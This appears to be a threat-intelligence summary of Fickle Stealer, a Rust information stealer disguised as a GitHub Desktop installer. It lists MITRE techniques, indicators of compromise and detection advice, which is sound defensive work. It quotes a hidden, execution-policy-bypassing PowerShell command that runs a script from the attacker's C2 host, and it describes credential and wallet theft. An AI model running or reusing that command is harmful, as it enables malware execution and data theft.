Keypoints
- Fickle Stealer is written in Rust and designed to harvest sensitive data from infected systems.
- It is distributed through phishing attachments, drive-by downloads, exploit kits, LNK files, and fake installers.
- The threat uses PowerShell scripts (e.g., bypassu.ps1, engine.ps1) to bypass User Account Control (UAC) and execute payloads.
- Capabilities include stealing browser-stored credentials, cryptocurrency wallet details, screenshots, and arbitrary files.
- Fickle employs custom packers and anti-analysis techniques to evade detection and sandboxing.
- It masquerades as GitHub Desktop with an invalid digital signature to appear legitimate and facilitate execution.
- Payloads contact a C2 at 185[.]213[.]208[.]245 and multiple malicious binaries and scripts have documented hashes.
MITRE Techniques
- [T1071] Command and Control – Maintains communication with remote servers to receive instructions and exfiltrate data (‘185[.]213[.]208[.]245’ and ‘185[.]213[.]208[.]245bypassu.ps1’).
- [T1203] Execution – Exploits vulnerabilities and uses command execution to run payloads (‘cmd /c powershell.exe -nop -win hidden -ExecutionPolicy Bypass -File 185[.]213[.]208[.]245bypassu.ps1’).
- [T1003] Credential Dumping – Collects credentials and stored browser data from compromised hosts (‘steals credentials from web browsers and applications’).
- [T1547] Persistence – Establishes persistence by creating scheduled tasks and using injected binaries to ensure continued execution (‘sets up a new task to execute engine.ps1’).
- [T1027] Obfuscated Files or Information – Uses a custom packer and obfuscated strings to hinder static analysis (‘custom packer to obfuscate its malicious code’).
- [T1041] Exfiltration Over C2 Channel – Transmits harvested data to attacker-controlled endpoints and a Telegram bot (‘regularly transmit details about the victim … to a Telegram bot managed by the attacker’).
Indicators of Compromise
- [Domain/URL] C2 and payload hosting – hxxp://185[.]213[.]208[.]245, 185[.]213[.]208[.]245bypassu.ps1 (malicious command-and-control and script host).
- [File Hashes] Sample payloads and scripts – SHA256: 4c930e2ed4f44cacfe5a5938c446f0973a31b0969d399dacbf6c2625aa72b812, MD5: C3C7DAA897ABEB907AEB13250E882FE5 (associated with the GitHub Desktop masquerade), and other reported hashes for payloads and scripts (multiple additional hashes listed in the report).
- [File Names] Masquerade and payloads – “GitHub Desktop” (spoofed installer), Dctooux.exe and Bootstrapper.exe (examples of dropped/executing binaries).
- [Script Names] PowerShell scripts used in attack chain – bypassu.ps1, u.ps1, engine.ps1 (UAC bypass, persistence, and injection logic).
- [Certificate/Digital Signature] Spoofed signer details – Signed by “GitHub, Inc.” and countersigned by “Microsoft Public RSA Time Stamping Authority” (invalid/forged signature used to appear legitimate).
Fickle Stealer is a Rust-built information stealer that surfaced in May 2024 and has been observed delivered through multiple vectors including phishing documents, malicious LNK files, drive-by downloads, and exploit kits. Operators mask the malware as legitimate software—most notably a fake “GitHub Desktop” installer with an invalid signature—to increase user trust and drive execution on victim machines.
Technically, the family chains PowerShell scripts together to bypass User Account Control (UAC) and deploy its payloads. A visible command string in analysis shows the loader invoking PowerShell with policy bypass and hidden window flags to run a remote script (for example, “cmd /c powershell.exe -nop -win hidden -ExecutionPolicy Bypass -File 185[.]213[.]208[.]245bypassu.ps1”). Engine.ps1 and inject.ps1 handle scanning, injection, and execution flows while storing encoded paths in prepares.dat to avoid reinjection.
Evasion and persistence are central to Fickle’s design: it uses a custom packer and obfuscated strings to frustrate static analysis, conducts anti-sandbox checks, and establishes scheduled tasks to maintain access. The stealer harvests browser credentials, system information, crypto wallet data, and can send collected metadata to a Telegram bot or attacker-controlled C2, then optionally self-delete after showing fake errors.
Defenders should look for the listed domains, script names, and hashes, verify suspicious digital signatures with tools like sigcheck, and monitor for PowerShell commands that use -ExecutionPolicy Bypass and hidden windows. Detection signatures (for example, PS/Agent.jk and Generic Obfuscated.g) are noted in vendor telemetry but hunting on the provided IOCs and behavioral indicators remains important.
Read more: https://www.trellix.com/blogs/research/new-stealer-uses-invalid-cert-to-compromise-systems/